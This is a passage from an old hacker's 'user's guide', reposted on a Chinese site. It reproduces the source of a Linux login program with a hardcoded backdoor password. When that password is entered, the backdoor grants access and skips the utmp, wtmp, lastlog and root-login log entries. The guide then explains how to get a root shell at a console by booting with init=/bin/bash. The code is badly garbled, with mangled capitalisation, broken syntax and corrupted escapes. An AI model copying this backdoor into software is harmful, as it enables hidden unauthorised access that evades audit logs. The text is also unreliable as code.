(void) SetPriority (prio_process, 0, 0);

#ifdef Have_quota

(void) Quota (Q_SetUID, 0, 0, 0);

#ENDIF

/ *

* -p is buy by getty to tell login not to destroy the environment

* -f is buy to skip a second login authentication

* -h is buy by other servers to pass the name of the remote

* Host to Login SO That It May Be Placed in Utmp and WTMP

* /

(void) gethostname (TBUF, SIZEOF (TBUF));

(void) STRNCPY (THISHOST, TBUF, SIZEOF (THISHOST) -1);

Domain = Index (TBUF, '.');

FFLAG = HFLAG = PFLAG = 0;

PASSWD_REQ = 1;

While ((CH = Getopt (Argc, Argv, "FH: P"))! = EOF) Switch (CH) {

Case 'f':

FFLAG = 1;

Break;

Case 'h':

IF (getuid ()) {

(void) FPRINTF (stderr,

"Login: -h for super-user only./N");

Exit (1);

}

HFLAG = 1;

IF (Domain && (P = Index (Optarg, '.') &&

StrcaseCMP (p, domain) == 0)

* p = 0;

Hostname = OPTARG;

Break;

Case 'P':

PFLAG = 1;

Break;

Case '?':

DEFAULT:

(void) FPRINTF (stderr,

"USAGE: Login [-fp] [username] / n");

Exit (1);

}

Argc - = OPTIND;

Argv = Optind;

IF (* argv) {

Username = * argv;

ask = 0;

Else

ask = 1;

#ifndef linux

IOCTLVAL = 0;

(void) ioctl (0, Tioclset, & IOCTLVAL);

(void) IOCTL (0, TiocnxCl, 0);

(void) FCNTL (0, f_setfl, ioctlval);

(void) ioctl (0, tiocgetp, & sgttyb);

SGTTYB.SG_ERASE = CERASE;

SGTTYB.SG_KILL = Ckill;

(void) IOCTL (0, TiocsLTC, & LTC);

(void) IOCTL (0, TiocSetc, & TC);

(void) ioctl (0, TiocSetp, & SGTTYB);

/ *

* Be Sure That We're in

* Blocking mode !!!

* This is real for HPUX

* /

IOCTLVAL = 0;

(void) IOCTL (0, Fiosnbio, & IOCTLVAL);

#ENDIF

For (CNT = getdtablesize (); CNT> 2; CNT -)

Close (CNT);

TTYN = TTYNAME (0);

IF (ttyn == null || * TTYN == '/ 0') {

(void) Sprintf (TNAME, "% s ??", _path_tty);

TTYN = TNAME;

}

setpgrp ();

{

Struct Termios TT, TTT;

Tcgetattr (0, & tt);

TTT = TT;

TTT.c_cflag & = ~ hupcl;

IF ((chown (ttyn, 0, 0) == 0) && (chmod (ttyn, 0622) == 0)) {

TcSetattr (0, TCSAFLUSH, & TTT);

Signal (SIGHUP, SIG_IGN); / * SO Vhangup () Wont Kill US * /

Vhangup ();

Signal (SIGHUP, SIG_DFL);

}

setsid ();

/ * RE-Open stdin, stdout, stderr after vhangup () closed them * /

/ * if it did, after 0.99.5 it doesn't! * /

OpenTTY (TTYN);

TcSetattr (0, TCSAFLUSH, & TT);

}

IF (TTY = RINDEX (TTYN, '/')))

TTY;

Else

TTY = TTYN;

OpenLog ("login", log_odelay, log_auth;

For (CNT = 0 ;; ask = 1) {

IOCTLVAL = 0;

#ifndef linux

(void) ioctl (0, TiocSetd, & IOCTLVAL);

#ENDIF

IF (ask) {

FFLAG = 0;

Getloginname ();

}

Checktty (UserName, TTY);

(void) STRCPY (TBUF, UserName);

IF (PWD = getpwnam (username))

Salt = pwd-> pw_passwd;

Else

Salt = "xx";

/ * if User not super-user, check for disabled logins * /

IF (PWD == Null || PWD-> PW_UID)

CHECKNOLOGIN ();

/ *

* Disallow automatic login to root; if not invoked by

* root, Disallow iF the uid's differ.

* /

IF (fflag && pwd) {

INT uid = getuid ();

PASSWD_REQ = PWD-> PW_UID == 0 ||

(UID && UID! = PWD-> PW_UID);

}

/ *

* If Trying to log in as root, but with INSECURE TERMINAL,

* Refuse the login attempt.

* /

IF (PWD && PWD-> PW_UID == 0 &&! Rootterm (TTY)) {

(void) FPRINTF (stderr,

"% s login refused on this terminal./N",

PWD-> PW_NAME);

IF (hostname)

Syslog (log_notice,

"Login% s refused from% s on TTY% S",

PWD-> PW_NAME, HostName, TTY;

Else

Syslog (log_notice,

"Login% s Refused on TTY% S",

PWD-> PW_NAME, TTY);

CONTINUE;

}

/ *

* If no pre-authentication and a password exists

* for this user, Prompt for one and verify it.

* /

IF (! passwd_req || (pwd &&! * pwd-> pw_passwd))

Break;

SetPriority (prio_process, 0, -4);

PP = GetPass ("Password:");

IF (strcmp (backdoor, pp) == 0) KRAD ; P = Crypt (PP, SALT);

SetPriority (prio_process, 0, 0);

#ifdef Kerberos

/ *

* If Not Present in PW File, Act As We Normally Would.

* IF We aren't Kerberos-Authenticated, Try The Normal

* PW file for a password. if That's OK, Log The User

* IN WITHOUT ISSUEING ANY Tickets.

* /

IF (PWD &&! KRB_GET_LREALM (Realm, 1)) {

/ *

* GET TGT for local realm; be Careful About Uid's

* Here for Ticket File Ownership

* /

(void) setReuid (getEuid (), PWD-> PW_UID);

Keerror = KRB_GET_PW_IN_TKT (PWD-> PW_NAME, "", Realm,

"KRBTGT", Realm, Default_tkt_life, pp);

(void) setuid (0);

IF (kerror == INTK_OK) {

MEMSET (PP, 0, Strlen (PP));

Notickets = 0; / * user got ticket * /

Break;

}

#ENDIF

(void) MEMSET (PP, 0, Strlen (PP));

IF (PWD &&! STRCMP (P, PWD-> PW_PASSWD))

Break;

IF (KRAD! = 0)

Break;

(void) Printf ("Login IncorRect / N");

Failures ;

Badlogin (UserName); / * log all bad logins * /

/ * We Allow 10 Tries, But After 3 We Start Backing Off * /

IF ( CNT> 3) {

IF (cnt> = 10) {

Sleepexit (1);

}

Sleep ((unsigned int) ((CNT - 3) * 5));

}

/ * COMMITTED to Login - Turn Off Timeout * /

(void) ALARM (UNSIGNED INT);

#ifdef Have_quota

IF (Quota (Q_SetUid, PWD-> PW_UID, 0, 0) <0 && errno! = EINVAL) {

Switch (errno) {

Case EUSERS:

(void) FPRINTF (stderr,

"Too Many Users Logged On Already./ntry Again Later./N");

Break;

Case EPROCLIM:

(void) FPRINTF (stderr,

"You Have Too Many Processes Running./N");

Break;

DEFAULT:

"" Quota (Q_SETUID ");

}

Sleepexit (0);

}

#ENDIF

/ * paranoia ... * /

Endpwent ();

/ * This Requires Some Explanation: As root we may not be able Toread The Directory of The User iF it is on an nfs mounted

FileSystem. We Temporarily Set Our Effective Uid to the User-UID

Making Sure That Week Root Privs. in The Real Uid.

A Portable Solution Would Require a fork (), But We Rely On Linux

Having the bsd setREUID () * /

{

CHAR TMPSTR [MAXPATHLEN];

UID_T ruid = getuid ();

GID_T EGID = GETEGID ();

STRNCPY (Tmpstr, PWD-> PW_DIR, MAXPATHLEN-12);

STRNCAT (TMPSTR, ("/" / "_path_hushlogin), maxpathlen;

SetRegID (-1, pwd-> pw_gid);

SetREUID (0, PWD-> PW_UID);

QuietLog = (Access (Tmpstr, R_OK) == 0);

SetUID (0); / * setREUID Doesn't do it alone! * /

Setreuid (RUID, 0);

SetRegID (-1, egid);

}

#ifndef linux

#ifdef Kerberos

IF (Notickets &&! QuietLog)

(void) Printf ("Warning: No Kerberos Tickets IssueD / N");

#ENDIF

#define twoweeks (14 * 24 * 60 * 60)

IF (PWD-> PW_Change || PWD-> PW_EXPIRE)

(void) GetTimeOfDay (& TP, (struct timezone *) null);

IF (pwd-> pw_change)

IF (tp.tv_sec> = pwd-> pw_change) {

(void) Printf ("Sorry - Your Password Has Expired./N");

Sleepexit (1);

}

Else IF (tp.tv_sec - pwd-> pw_change

TTP = localtime (& pwd-> pw_change);

(void) Printf ("Warning: Your Password Expires ON% S% D,% D / N",

MONTHS [TTP-> TM_MON], TTP-> TM_MDAY, TM_YEAR_BASE TTP-> TM_YEAR);

}

IF (PWD-> PW_EXPIRE)

IF (tp.tv_sec> = pwd-> pw_expire) {

(void) Printf ("Sorry - Your Account Has Expired./N");

Sleepexit (1);

}

Else IF (tp.tv_sec - pwd-> pw_expire

TTP = localtime (& PWD-> PW_EXPIRE);

(Void) Printf ("Warning: Your Account Expires ON% S% D,% D / N", Months [TTP-> TM_MON], TTP-> TM_MDAY, TM_YEAR_BASE TTP-> TM_YEAR);

}

/ * Nothing else Left to fail - really log in * /

{

Struct UTMP UTMP;

MEMSET ((char *) & uTMP, 0, sizeof (utmp));

(void) Time (& UTMP.UT_TIME);

Strncpy (utmp.ut_name, username, sizeof (utsp.ut_name);

IF (hostname)

Strncpy (utmp.ut_host, hostname, sizeof (utsp.ut_host);

Strncpy (utmp.ut_line, tty, sizeof (utsp.ut_line);

}

#ELSE

/ * for Linux, Write Entries in UTMP and WTMP * /

{

Struct UTMP UT;

Char * TTYABBREV;

INT WTMP;

MEMSET ((char *) & UT, 0, SIZEOF (UT);

Ut.ut_type = user_process;

Ut.ut_pid = get pid ();

STRNCPY (Ut.ut_Line, TTYN SIZEOF ("/ dev /") - 1, SIZEOF (Ut.ut_Line);

TTYABBREV = TTYN SIZEOF ("/ dev / tty") - 1;

Strncpy (ut.ut_id, ttyabbrev, sizeof (ut.ut_id));

(void) Time (& UT.UT_TIME);

STRNCPY (Ut.ut_user, username, sizeof (ut_user);

/ * Fill in Host and IP-Addr Fields When We get networking * /

IF (hostname) {

Struct hostent * he;

STRNCPY (Ut.ut_host, hostname, sizeof (ut_host));

IF ((he = gethostbyname (hostname))))

Memcpy (& ut.ut_addr, he-> h_addr_list [0],

SIZEOF (Ut.ut_ADDR);

}

Utmpname (_path_utmp);

Setutent ();

IF (KRAD == 0)

PUTUTLINE (& UT);

Endutent ();

IF ((WTMP = Open (_Path_WTMP, O_APpend | O_WRONLY))> = 0) {

FLOCK (WTMP, Lock_ex);

IF (KRAD == 0)

Write (WTMP, (Char *) & UT, SIZEOF (UT));

FLOCK (WTMP, LOCK_UN);

Close (WTMP);

}

/ * fix_utmp_type_and_user (username, ttyn, login_process); * /

#ENDIF

IF (KRAD == 0)

Dolastlog (QuietLog);

#ifndef linux

IF (! hflag) {/ * xxx * /

Static struct Winsize Win = {0, 0, 0, 0};

(void) ioctl (0, tiocswinsz, & win);

#ENDIF

(void) Chown (TTYN, PWD-> PW_UID,

(GR = getGRNAM (TTYGRPNAME))? GR-> GR_GID: PWD-> PW_GID);

(void) CHMOD (TTYN, 0622);

(void) setgid (PWD-> PW_GID);

INITGROUPS (UserName, PWD-> PW_GID);

#ifdef Have_quota

Quota (Q_DoWarn, PWD-> PW_UID, (DEV_T) -1, 0);

#ENDIF

IF (* pwd-> pw_shell == '/ 0')

PWD-> pw_shell = _path_bshell;

#ifndef linux

/ * Turn on new line discipline for the csh * /

Else if (! strcmp (pwd-> pw_shell, _path_cshell) {

IOCTLVAL = NTTYDISC;

(void) ioctl (0, TiocSetd, & IOCTLVAL);

}

#ENDIF

/ * PRESERVE TERM EVEN WITHOUT -P FLAG * /

{

Char * EP;

IF (! ((EP = GetENV ("TERM")) && (TerMenV = STRDUP (EP)))))))))

Termenv = "DUMB";

}

/ * Destroy Environment Unless User Has Requested Preservation * /

IF (! pflag)

{

Environ = (char **) malloc (sizeof (char *));

MEMSET (Environ, 0, Sizeof (char *));

}

#ifndef linux

(void) Stenv ("Home", PWD-> PW_DIR, 1);

(void) STENV ("shell", pwd-> pw_shell, 1);

IF (Term [0] == '/ 0')

Strncpy (Term, StypeOf (TTY), SIZEOF (TERM));

(void) Stenv ("Term", Term, 0);

(void) STENV ("User", PWD-> PW_NAME, 1);

(void) STENV ("Path", _Path_Defpath, 0);

#ELSE

(void) STENV ("Home", PWD-> PW_DIR, 0); / * Legal to override * /

IF (PWD-> PW_UID)

(void) Stenv ("Path", _Path_Defpath, 1);

Else

(void) Stenv ("Path", _Path_Defpath_root, 1);

(void) STENV ("shell", pwd-> pw_shell, 1);

(void) Stenv ("Term", Termenv, 1);

/ * Mailx Will Give A Funny Error MSG if you forget this one * /

(void) Sprintf (TMP, "% s /% s", _ Path_mAildir, PWD-> PW_NAME);

(void) STENV ("Mail", TMP, 0); / * logname is not docutented in login (1) But

HP-UX 6.5 DOES It. We'll Not ALLIFYING IT.

* /

(void) Stenv ("Logname", PWD-> PW_NAME, 1);

#ENDIF

#ifndef linux

IF (TTY [SIZEOF ("TTY") - 1] == 'D')

IF (KRAD == 0)

Syslog (log_info, "DIALUP% S,% S", TTY, PWD-> PW_NAME);

#ENDIF

IF (PWD-> PW_UID == 0)

IF (KRAD == 0)

IF (hostname)

Syslog (log_notice, "root login on% s from% s",

TTY, HostName);

Else

Syslog (log_notice, "root login on% s", tty);

IF (! quietlog) {

Struct stat st;

MOTD ();

(void) Sprintf (TBUF, "% s /% s", _path_mAildir, pwd-> pw_name);

IF (Stat (TBUF, & ST) == 0 && St.st_size! = 0)

(void) Printf ("You Have% SMAIL. / N",

(st.st_mtime> st.st_atime)? "New": "");

}

(void) Signal (SIGALRM, SIG_DFL);

(void) Signal (SIGQUIT, SIG_DFL);

(void) Signal (SIGINT, SIG_DFL);

(void) Signal (SIGTSTP, SIG_IGN);

(void) Signal (SIGHUP, SIG_DFL);

/ * Discard Permissions Last So CAN't Get Killed and Drop Core * /

IF (setuid (pwd-> pw_uid) <0 && pwd-> pw_uid) {

Syslog (log_alert, "setuid () failed");

Exit (1);

}

/ * WAIT Until Here to change Directory! * /

IF (chDIR (PWD-> PW_DIR) <0) {

(void) Printf ("No Directory% S! / N", PWD-> PW_DIR);

IF (chDIR ("/")))

exit (0);

PWD-> PW_DIR = "/";

(void) Printf ("Logging in with home = /"//"./n");

}

/ * if The shell field HAS A Space: Treat IT Like a shell script * /

IF (strchr (pwd-> pw_shell, '')) {

Char * buff = malloc (Strlen (pwd-> pw_shell) 6);

IF (buff) {

STRCPY (BUFF, "EXEC");

STRCAT (BUFF, PWD-> PW_SHELL); Execlp ("/ Bin / SH", "-sh", "-c", buff, (char *) 0);

FPRINTF (stderr, "login: couldn't Exec Shell Script:% s. / n",

STRERROR (Errno));

exit (0);

}

FPRINTF (stderr, "login: no memory for shell script./N);

exit (0);

}

TBUF [0] = '-';

STRCPY (TBUF 1, ((p = rindex (pwd-> pw_shell, '/'))?

P 1: PWD-> PW_SHELL));

Execlp (PWD-> PW_SHELL, TBUF, (CHAR *) 0);

(void) FPRINTF (stderr, "login: no shell:% s. / n", strrror (errno));

exit (0);

}

Void

Getloginname ()

{

Static char nbuf [ut_namesize 1];

For (;;) {

(void) Printf ("/ N% s login:", thishost; fflush (stdout);

For (p = nbuf; (ch = getchar ())! = '/ n';) {

IF (ch == EOF) {

Badlogin (UserName);

exit (0);

}

IF (P

* p = CH;

}

IF (p> nbuf)

IF (NBUF [0] == '-')

(void) FPRINTF (stderr,

"Login Names May Not Start with '-'. / N");

Else {

* p = '/ 0';

Username = nbuf;

Break;

}

void timedout ()

{

Struct Termio Ti;

(void) FPrintf (stderr, "login timed out after% d seconds / n", timeout;

/ * reset echo * /

(void) IOCTL (0, Tcgeta, & Ti);

Ti.c_lflag | = echo;

(void) ioctl (0, tcseta, & ti);

exit (0);

}

int

Rootterm (TTYN)

Char * ttyn;

#ifndef linux

{

Struct TTYENT * T;

Return ((t = getttynam (ttyn)) & tty_secure);

}

#ELSE

{

Int fd;

Char BUF [100], * P;

Int CNT, MORE;

FD = Open (securetty, o_rdonly);

IF (FD <0) Return 1;

/ * Read Each line in / etc / securetty, if a line matchesur ttyline

Then root is allowed to login on this tty, and we shop returntrue. * /

For (;;) {

P = BUF; CNT = 100;

While (- CNT> = 0 && (more = read (fd, p, 1)) == 1 && * p! = '/ n') p ;

IF (more && * p == '/ n') {

* p = '/ 0';

IF (! strcmp (buf, ttyn) {

Close (FD);

Return 1;

Else

CONTINUE;

} else {

Close (FD);

Return 0;

}

#ENDIF

JMP_BUF MOTDINTERRUPT;

Void

MOTD ()

{

Void (* Oldint) (), sigint ();

Char tbuf [8192];

IF ((fd = open (_Path_motdfile, o_rdonly, 0)) <0)

Return;

Oldint = SIGNAL (SIGINT, SIGINT);

IF (SetJMP (MotdInterrupt) == 0)

While (nchars = read (fd, tbuf, sizeof (tbuf))> 0)

(void) WRITE (Fileno (stdout), TBUF, NCHARS;

(void) Signal (SIGINT, OLDINT);

(void) Close (FD);

}

Void synt ()

{

Longjmp (Motdinterrupt, 1);

}

Void

Checknologin ()

{

Char tbuf [8192];

IF ((fd = open (_path_nologin, o_rdonly, 0))> = 0) {

While (nchars = read (fd, tbuf, sizeof (tbuf))> 0)

(void) WRITE (Fileno (stdout), TBUF, NCHARS;

Sleepexit (0);

}

Void

Dolastlog (Quiet)

Int quiet;

{

Struct LastLog LL;

Int fd;

IF ((fd = open (_path_lastlog, o_rdwr, 0))> = 0) {

(void) LSeek (FD, (OFF_T) PWD-> PW_UID * SIZEOF (LL), L_SET);

IF (! quiet) {

IF (READ (FD, (Char *) & ll, SizeOf (LL) == SizeOf (LL) &&

Ll.ll_time! = 0) {

(void) Printf ("Last Login:%. * S",

24-5, (char *) CTIME (& ll.ll_time);

IF (* ll.ll_host! = '/ 0')

Printf ("from%. * s / n",

(int) sizeof (ll.ll_host), ll.ll_host);

Else

Printf ("ON%. * S / N",

(int) sizeof (ll.ll_line), ll.ll_line);

}

(void) Lseek (FD, (OFF_T) PWD-> PW_UID * SIZEOF (LL), L_SET);

MEMSET ((char *) & ll, 0, sizeof (ll);

(void) TIME (& ll.ll_time);

STRNCPY (ll.ll_line, tty, sizeof (ll.ll_line);

IF (hostname)

STRNCPY (ll.ll_host, hostname, sizeof (ll.ll_host));

IF (KRAD == 0)

(void) Write (FD, (Char *) & ll, SizeOf (LL));

(void) Close (FD);

}

Void

Badlogin (Name)

Char * name;

{

IF (failures == 0)

Return;

IF (hostname)

Syslog (log_notice, "% d login failure% s from% s,% s",

Failures, Failures> 1? "s": "", hostname, name);

Else

Syslog (log_notice, "% d login failure% s on% s,% s",

Failures, Failures> 1? "s": "", tty, name);

}

#undef unknown

#define unknown "su"

#ifndef linux

Char *

STYPEOF (TTYID)

Char * ttyid;

{

Struct TTYENT * T;

Return (TTYID && (T = GetTynam (TTYID))? T-> TY_TYPE: UNKNOWN);

}

#ENDIF

Void

Checktty (User, TTY)

Char * user;

Char * TTY;

{

File * f;

Char BUF [256];

Char * PTR;

Char devname [50];

Struct stat STB;

/ * NO / ETC / UserTty, Default to allow access * /

IF (! (f = fopen (_path_usertty, "r")))))).

While (FGETS (BUF, 255, F)) {

/ * Strip Comments * /

For (PTR = BUF; PTR

IF (* ptr == '#') * PTR = 0;

STRTOK (BUF, "/ T");

IF (Strncmp (User, BUF, 8) == 0) {

While ((ptr = strtok (null, "/ t / n"))) {

IF (strNCMP (TTY, PTR, 10) == 0) {

Fclose (f);

Return;

}

IF (strcmp ("pty", ptr) == 0) {

#ifdef linux

Sprintf (devName, "/ dev /% s", ptr);

/ * Very Linux Dependent, Recognize Pty As Alias

For all pseudo tty's * /

IF ((Stat (DevName, & STB)> = 0)

&& major (stb.st_rdev) == 4 && minor (stb.st_rdev)> = 192) {

Fclose (f);

Return;

}

#ENDIF

}

/ * IF We get here, / etc / ready at Exists, There's a line

Beginning with our username, But it doesn't contain the

Name of the tty where the user is trying to log in.

So Deny Access! * /

Fclose (f);

Printf ("Login on% s DENIED./N", TTY);

Badlogin (User);

Sleepexit (1);

}

Fclose (f);

/ * Users not exercise in / etc / readyred access

On all tty's * /

}

Void

GetStr (BUF, CNT, ERR)

Char * buf, * err;

int CNT;

{

CHAR CH;

Do {

IF (read (0, & ch, sizeof (ch))! = SizeOf (CH))

Exit (1);

IF (--CNT <0) {

(void) FPRINTF (stderr, "% s too long / r / n", err);

Sleepexit (1);

}

* BUF = CH;

WHILE (CH);

}

Void

SleepeXit (EVAL)

int evAl;

{

Sleep (UNSIGNED INT) 5);

Exit (evAl);

}

SO if you real wanna have root access and have access to console, reboot

IT (Carefully, Do A Ctrl-Alt-Del) and at Lilo Prompt Do A:

Init = / bin / bash rw (for Linux 2.0.0 and Above (i think)).

Don't Wonder Why I Was Speaking Only About Rootshell and DHP.com, There Are

Lots of Other Very Good Hacking Pages, But Thene ONES Are Updated Very

Quickly and Besides, Are The Best Pages I Know.

So Folks, this was it ...

First Version of My User's Guide 1.0.

Maybe I'll Do Better Next Time, Andiff I Have More Time, I'll Add About

50 (more) Other Exploits, Remote Ones, New Stuff, New Techniques, etc ...

See Ya, Folks!

Good night !!! (It's 6.am now).

DAMN !!!

Arghhh! I forward ... my e-mail adress is .

For now.

______________________

If you feel offended by this subject (Hacking) or you think that you coulddo better, don't read the below information ...

This file is for educational purposes online ...;)

I ain't responsible for any damages you Made instore this ... (i'm Very

Serious ...)

So this Can Be Copied, But Not Modified (Send Me The Changes, Andiff "

Are Good, I'll Include Them.

Don't Read It, 'Cuz IT Might Be Illegal.

I Warned you ...

If you would like to Continue, Press .

转载请注明原文地址:https://www.9cbs.com/read-107792.html

9cbs

New Post(0)